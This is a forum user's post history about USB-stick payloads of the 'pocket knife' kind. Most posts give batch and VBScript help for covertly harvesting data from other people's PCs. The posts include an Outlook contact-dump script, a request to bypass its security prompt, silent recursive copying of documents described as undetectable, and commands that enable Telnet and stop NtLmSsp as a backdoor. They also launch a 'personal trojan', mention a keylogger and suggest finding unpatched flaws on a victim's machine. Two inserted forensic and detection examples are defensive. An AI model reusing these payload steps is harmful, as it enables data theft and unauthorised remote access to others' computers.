DMilton

Active Members
  • Posts

    132
Posts posted by DMilton

  1. Since Leapos is not replying, he might come back, he might not, but until then I think I'll carry the torch. DMilton, if you would be so kind as to help, msg me on MSN: Alex@normalms.com. So far I'm almost done with some additions to it.

    I think the project must be continued, and if alexthedrifter carries the torch I'll be glad to help a bit with cleaning code, digging for some other interesting things and with other community contributions or ideas.

    But it must be in another post, and I have a further question: is anybody else interested in working on it?

  2. Also the whole idea of this project is not to be sneaky about hiding the cmd box, just enjoy it for what it is. ;)

    I agree that in forensic work, the last thing you want to see is nothing; there's no sense in hiding the cmd box. This payload was originally made by Tcstool for forensic work. I agree it can be used for other purposes such as grabbing sensitive info from a pc, but...

    Are you already dumping the Attached USB logs? Never know if the machine was owned by a U3 hacker..

    PDF FILE WARNING

    I saw the white paper and the info looks great! You can extract not only the serial number of all attached USB, but the last date it was connected and more... For forensic matters I think it is a great implementation. If you want some help with this, I'll be ready to try to do my best with it. :lol:
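
For the forensic side of this post, an added example (not from the thread or the white paper) that pulls vendor, product and serial number out of USBSTOR device keys. It assumes the text output of `reg query HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR /s`; the sample keys are constructed, and last-connection dates are not covered.

```python
import re

# Constructed sample of key lines as printed by
# `reg query HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR /s`; names and serials are made up.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_ACME&Prod_Flash_Drive&Rev_1.00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_ACME&Prod_Flash_Drive&Rev_1.00\0A1B2C3D4E5F&0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\Disk&Ven_ACME&Prod_Flash_Drive&Rev_1.00\0A1B2C3D4E5F&0\Device Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\CdRom&Ven_EXAMPLE&Prod_Demo_Stick&Rev_2.18\7&1c2d3e4f&0
"""

# Matches only device-instance keys: ...\USBSTOR\<class>&Ven_..&Prod_..&Rev_..\<instance>
KEY = re.compile(
    r'\\Enum\\USBSTOR\\(?P<cls>[^&\\]+)&Ven_(?P<vendor>[^&\\]*)'
    r'&Prod_(?P<product>[^&\\]*)&Rev_(?P<rev>[^\\]*)\\(?P<instance>[^\\]+)$',
    re.I)

def parse_usbstor(text):
    """Return one record per device instance found in the reg query output."""
    devices = []
    for line in text.splitlines():
        m = KEY.search(line.strip())
        if not m:
            continue  # device-type keys and deeper subkeys carry no instance ID
        inst = m.group("instance")
        # When the second character is '&', Windows generated the ID because the
        # device reported no serial number, so it cannot identify the stick
        # across machines.
        generated = len(inst) > 1 and inst[1] == "&"
        devices.append({
            "class": m.group("cls"),
            "vendor": m.group("vendor"),
            "product": m.group("product").replace("_", " "),
            "revision": m.group("rev"),
            "serial": None if generated else inst.rsplit("&", 1)[0],
            "instance_id": inst,
        })
    return devices

if __name__ == "__main__":
    for dev in parse_usbstor(SAMPLE):
        print(dev)
```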

  3. I think we can improve the payload a bit more... But I'll wait a while longer for Leapo to take the torch. These days are complicated for someone who is studying...

    If he passes the torch, I'll be very glad to continue it with some of the community support. If he doesn't, I'll be very glad to help in the progress and improvement of it. In both cases, this project will continue....

  4. Impressive voodoo.

    :P

    I was really wondering if I could get the 'date' and 'time' variables to be able to be called from the 'yourbatch.bat' instead of adding to the vbs.

    Haven't tried yet, but in 'yourbatch.bat' I'll put something like...

    set "date=%date%"

    set "time=%time%"

    This would let me use 'anotherbatch.bat' to use the date and time variables...

    call 'yourbatch.bat'

    echo %date%

    echo %time%

    Get what I mean? Anyway, thanks for all the info! Very useful.

    You don't need to define the variables twice; if you CALL ANOTHERBATCH.BAT from yourbatch.bat, the variables given by the vbs will work perfectly. It's because when you call one batch program from another, all the defined variables still exist.

    But if you definitely don't want to use a vbs launcher to give the variables to the batch, you can apply the batch method I showed you to format the date and time.

  5. How would i test the updates to see if they are vulnerable?

    You must have a test system with all available updates installed. Then see the differences between your updates and the updates extracted from the victim's pc, then you can exploit the non-installed patches as alexthedrifter says... googling.

  6. I caught the missing parenthesis when I was looking at the code, which was cool because I don't know vb.

    Yet another thing I learned...I need to run the vb script. Lol. I was just running the batch file; no wonder it didn't work!

    Do you know of a way to get it so that the date and time variables are useable to all my batch files? Or even a way to do it from within a batch file?

    You can use the same vbs with each batch file you need to. There are two ways to do it; one is by executing one instance of the vbs per file... See

    strPath = "YOURBATCH.BAT"
    objShell.Run strPath, 1, False

    The run command doesn't control the results of the running app, in this case, YOURBATCH.BAT.

    But if you are attempting to run more batches at a time, you can add each batch to the same script and control their execution by managing the boolean value of the run method: with "True" the program will wait until the batch finishes, and with "False" it doesn't wait for the batch to finish, so the program will continue with the next line of code.

    Example:

    Prog1 = "YOURBATCH.BAT" 'This is in the same folder as the vbs
    Prog2 = "C:\Windows\hiddenbatch.bat" 'For a batch in another folder
    Prog3 = "%SYSTEMROOT%\SYSTEM32\my_personal_trojan.exe" 'Using environment variables
    objShell.Run Prog1, 1, False ' "yourbatch.bat" runs in a normal window (style 1) and the script doesn't wait
    objShell.Run Prog2, 1, True ' "hiddenbatch.bat" runs and the script waits for it to finish
    objShell.Run Prog3, 1, False

    In all the yourbatch.bat, hiddenbatch.bat or my_personal_trojan.exe, the Date and Time variables can be called from the batch.

    If you want to know more on this stuff, see Microsoft Windows 2000 Scripting Guide

    For the subject of this post, see This

    <_< But if you want, you can format dates the batch way... If you use something like this in your batch, with a date formatted as DD/MM/YYYY:

    set DateToFile=%date:~6,4%-%date:~3,2%-%date:~0,2%
    \stext %computername%[%DateToFile%].txt

    As you can see, you can use the %DateToFile% variable in your program; it will give the date formatted as YYYY-MM-DD...

    Now you can play with it to do the same with the %TIME% system environment variable, or simply use SET /? from the command line to see examples of how to use variables and how to define them. ;)

  7. It's not a new or brilliant idea, but I've been working a bit on extracting the contacts list from the Outlook address book.

    This implementation, simply added to any payload, would be able to extract the contact list to a plain text file.

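    On Error Resume Next ' needed so the err check below can run instead of the script aborting
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set outlook = WScript.CreateObject("Outlook.Application")
    If Not Err = 0 Then
        MsgBox "Outlook is not available."
    Else
        On Error GoTo 0
        Set mapi = outlook.GetNameSpace("MAPI")
        Set MSOfile = fso.CreateTextFile("outlook-contacts.txt")
        ' Walk every address list, then every entry in that list
        For ctrentries = 1 To mapi.AddressLists.Count
            Set a = mapi.AddressLists(ctrentries)
            x = 1
            For countEntries = 1 To a.AddressEntries.Count
                contact = a.AddressEntries(x) ' default property of the entry
                MSOfile.WriteLine contact
                x = x + 1
            Next
        Next
        MSOfile.Close
    End If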

    Of course, the err check is only for testing purposes. ;)

    The problem is the message box (at least in Outlook 2003) asking for permission to read the contents of the pst file.

    Any ideas on how to bypass the message box, some fix to the code or idea?

  8. DMilton,

    I can't get your vbs to work.

    See the code in line 1 of the vbs:

    Set objShell = CreateObject("Wscript.Shell"

    must be (also edited in previous post):

    Set objShell = CreateObject("Wscript.Shell")

    I have tested it and it works OK (at least in WXP)

    Maybe it's just that I'm on Vista, but it gives me the regular date and time variables.

    I have 'yourbatch.bat' set to 'vars.cmd' and then in there it makes a folder calling the variables '%date%-%time%'.

    If you get the variables, you can do whatever you want with them, calling them, batching them, etc.

    A proof of concept of how it works (maybe it can be useful for your mkdir): I have written the following batch, called yourbatch.bat (place it in the same folder as the vbs). Execute the vbs and it will call the yourbatch.bat file, which will create a plain txt containing the values of the variables given. It also creates a new folder with the mentioned structure.

    ::yourbatch.bat
    echo off
    echo PROOF OF CONCEPT >proofdatetime.txt
    echo var Date: %Date% >>proofdatetime.txt
    echo var Time: %Time% >>proofdatetime.txt
    echo mkdirectory: %computername%[%Date%-%Time%].txt>>pruebadate.txt
    mkdir %computername%[%Date%-%Time%]

    P.S. I also attempted to call 'vars.cmd' to see if that works too.

    I want all the variables set in the 'vars.cmd' and then have all my batch files call 'vars.cmd' (looks neater and more efficient)

    You can do what you want with the variables. But I think the problem was solved with the mentioned code change.

  9. Im kind of a n00b and I didn't read all the threads so someone might have already asked this but is it possible for there to be a metasploit module in Pocket Knife? like, it could get the system info analyze it and come up with a list of possible exploits. Then u could exploit that computer when u get home. pls reply if this would be possible. Im not much of a programmer. I hardly know C++ so i might not be of much help.

    Pocket knife extracts a list of updates of the system, you can test them at home and search for any vulnerability.

  10. That's not a bad idea. I have a nice VBScript for this, but it occasionally will hang up on certain systems, so I'm working the kinks out.

    I think it's a good idea too.

    Do you know why it hangs up? On what kind of systems does it hang up? If you want us to have a look at that piece of the VBScript, a good way to debug it would be posting it or PMing it, as you like.

  11. There's no mistake. It's a piece from pocketknife and the only thing you have to do is define the path you want to copy the files to.

    Before creating the path %computername%\Slurp_Data\Desktop, you must create the ..\..\Documents folder, the \logfiles folder, the %computername% folder, the Slurp_Data folder...

    Use one mkdir for each folder...

    mkdir ..\..\Documents
    mkdir ..\..\Documents\logfiles
    mkdir ..\..\Documents\logfiles\%computername%
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop
    xcopy "C:\*.doc" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\" /s /c /q /r /h /y

  12. Hey guys, these usb hacks are awesome. I have a simple task that I want to perform: I just want, when I insert my usb stick into a computer, to search for specific types of files on the computer's hard drive and copy them to the usb, just that. Is something like this possible? Will this kind of task run undetected or will it trigger an alarm? Thanks in advance.

    You can search for specific types of files. The task is undetectable and you can find the solution by reading the forum...

    The filtering and copying can be done with just a batch file. But, you will only be able to do it in one/two directories. If this is black/grey hat, you are gonna need something like nircmd.

    You're not only able to do it in one/two directories... You can search the entire hdd. nircmd is not needed (you can also use it), you can program it to make the work invisible; it doesn't depend on whether what you do is white/grey/black hat, but on the way you program it and use it.

  13. It depends on what you want to do with your payload...

    Amish and switchblade are both in Leapo's pocketknife. The best you can do is read all the posts (pinned and newest) and look for the features you want.

    Or better, you can modify the batches to do what you want.

    Reading is the better solution. There's a lot of payloads you can execute from a non-U3.

  14. As ever, I must say it...

    If you use an alternative installation language, you will get an error when trying to get "%ALLUSERSPROFILE%\Start Menu". But if you query the registry for it in the HKEY_CLASSES_ROOT\CLSID\{4622AD11-FF23-11d0-8D34-00A0C90F2719} key value, you will find the exact and correct name of the "Start Menu" folder.

    For example, as all of you know, I'm Spanish and if I try to go to "%ALLUSERSPROFILE%\Start Menu" surely I can't, because my Start Menu is named "Menú Inicio"...

    It's possible to get the key of the Start Menu into a variable by using a variation of the reliable paths method described by me in the wiki... Or simply using vbs, of course! :lol:

    Take a look if you want!

  15. Then I will be testing why it doesn't run unless it is in a desktop folder. The code seems to be ok, but... Hummm....

    :Edit

    Issues with Telnet:

    By the way, there are some problems with the Telnet Service. The TlntSvr doesn't start with

    sc config TlntSvr start= boot

    but with

    sc config TlntSvr start= auto

    On the other hand, the Telnet Service is disabled in XP SP2 and we can launch it, but it is not available in XP Home. So we must check which OS we have before doing the task, or create the entire service to use it correctly (it can be done by vbs).

    Another thing to check to make sure the service starts is that TlntSvr is installed on the machine. To do so, we can check for the correct branch in the registry (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr) and operate accordingly, adding the service or not. It will only take a few lines to check it and, if it is not installed, we can easily add the needed keys to the registry with the batch or the vbs to operate the Service correctly.

    Before enabling the Telnet Service, I think it is a better option to stop the NtLmSsp Service (NT LM Security Support Provider).

    net stop NtLmSsp

    The final code would be...

    tlntsvr /service
    net stop NtLmSsp
    sc config TlntSvr start= auto

    But definitely, Telnet has problems in Windows XP SP2... What about using nc?
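
A defender's view of the command sequence in this post, as an added example that is not part of the original thread: it classifies process-creation command lines for the three commands quoted above and ranks hosts for triage. The record layout, host names and severity labels are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("WS-014", r"C:\WINDOWS\system32\tlntsvr.exe /service"),
    ("WS-014", "net stop NtLmSsp"),
    ("WS-014", "sc.exe  CONFIG tlntsvr start= auto"),
    ("WS-022", "sc config TlntSvr start= disabled"),  # hardening, not enabling
    ("WS-031", "sc query TlntSvr"),                   # read-only query
    ("WS-031", "net stop Spooler"),                   # unrelated service
]

# sc config [\\server] TlntSvr ... start= <type>  (sc wants a space after "start=")
SC_CONFIG = re.compile(
    r'(?:^|[\\/\s"])sc(?:\.exe)?"?\s+(?:\\\\\S+\s+)?config\s+"?tlntsvr"?\s+'
    r'.*?\bstart=\s*(\w+)', re.I)
NET_STOP = re.compile(r'(?:^|[\\/\s"])net1?(?:\.exe)?"?\s+stop\s+"?ntlmssp"?', re.I)
TLNT_REG = re.compile(r'(?:^|[\\/\s"])tlntsvr(?:\.exe)?"?\s+/service\b', re.I)

def classify(cmdline):
    """Return a tag for command lines that match the sequence, else None."""
    m = SC_CONFIG.search(cmdline)
    if m and m.group(1).lower() != "disabled":
        return "telnet_start_type_" + m.group(1).lower()
    if NET_STOP.search(cmdline):
        return "ntlmssp_stopped"
    if TLNT_REG.search(cmdline):
        return "telnet_service_registered"
    return None

def findings_by_host(events):
    hits = defaultdict(list)
    for host, cmdline in events:
        tag = classify(cmdline)
        if tag:
            hits[host].append(tag)
    return dict(hits)

def hosts_to_triage(events):
    """Hosts where Telnet was enabled; 'high' when NtLmSsp was also stopped."""
    ranked = {}
    for host, tags in findings_by_host(events).items():
        if any(t.startswith("telnet_start_type_") for t in tags):
            ranked[host] = "high" if "ntlmssp_stopped" in tags else "medium"
    return ranked

if __name__ == "__main__":
    print(hosts_to_triage(SAMPLE_EVENTS))
```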

  16. I think the whole bat to exe is what's doing it, so that's not going to work.. I just had a chance to try this out on a computer, and I was only able to get it to work if it was in a folder on the desktop.. so I'll get some time and work on that part :/

    I feel you didn't understand me (sorry, probably it's my poor English). The question was whether the payload.exe is a compilation of all the needed files (including keylogger and backdoor) or whether payload.exe needs the batches, the 1.vbs and the other exes to go? :blink:
